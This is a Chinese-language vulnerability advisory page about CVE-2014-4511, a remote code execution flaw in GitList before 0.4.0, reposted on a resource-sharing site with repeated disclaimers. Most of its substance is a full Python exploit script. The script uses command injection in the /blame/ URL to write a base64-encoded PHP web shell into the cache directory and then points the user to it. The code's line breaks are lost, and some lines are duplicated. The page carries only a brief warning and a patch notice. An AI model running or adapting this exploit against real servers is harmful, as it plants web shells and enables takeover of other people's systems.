GitList远程代码执行漏洞(CVE-2014-4511)
也想出现在这里?
联系我们吧
受影响系统:GitList GitList < 0.4.0GitList GitList描述:——————————————————————————–BUGTRAQ ID: 68253CVE(CAN) ID: CVE-2014-4511GitList是用PHP编写的开源软件,是git库浏览器。GitList 0.4.0之前版本在实现上存在远程代码执行漏洞,远程攻击者可利用此漏洞执行任意代码。<*来源:drone *>测试方法: ——————————————————————————–
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
复制代码
代码如下:
from commands import getoutput import urllib import sys from commands import getoutput import urllib import sys\”\”\” Exploit Title: Gitlist <= 0.4.0 anonymous RCE Date: 06/20/2014 Author: drone (@dronesec) Vendor Homepage: <a href=\”http://gitlist.org/\”>http://gitlist.org/</a> Software link: <a href=\”https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz\”>https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz</a> Version: <= 0.4.0 Fixed in: 0.5.0 Tested on: Debian 7 More information: <a href=\”http://hatriot.github.io/blog/2014/06/29/gitlist-rce/\”>http://hatriot.github.io/blog/2014/06/29/gitlist-rce/</a> cve: CVE-2014-4511 \”\”\”if len(sys.argv) <= 1: print \’%s: [url to git repo] {cache path}\’ % sys.argv[0] print \’ Example: python %s <a href=\”http://localhost/gitlist/my_repo.git\’\”>http://localhost/gitlist/my_repo.git\'</a> % sys.argv[0] print \’ Example: python %s <a href=\”http://localhost/gitlist/my_repo.git\”>http://localhost/gitlist/my_repo.git</a> /var/www/git/cache\’ % sys.argv[0] sys.exit(1)url = sys.argv[1] url = url if url[-1] != \’/\’ else url[:-1]path = \”/var/www/gitlist/cache\” if len(sys.argv) > 2: path = sys.argv[2]print \'[!] Using cache location %s\’ % path# payload <?system($_GET[\’cmd\’]);?> payload = \”PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=\”# sploit; python requests does not like this URL, hence wget is used mpath = \’/blame/master/\”\”`echo {0}|base64 -d > {1}/x.php`\’.format(payload, path) mpath = url+ urllib.quote(mpath)out = getoutput(\”wget %s\” % mpath) if \’500\’ in out: print \'[!] Shell dropped; go hit %s/cache/x.php?cmd=ls\’ % url.rsplit(\’/\’, 1)[0] else: print \'[-] Failed to drop\’ print out
建议:——————————————————————————–厂商补丁:GitList——-目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://gitlist.org/
1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » GitList远程代码执行漏洞(CVE-2014-4511)
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » GitList远程代码执行漏洞(CVE-2014-4511)
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html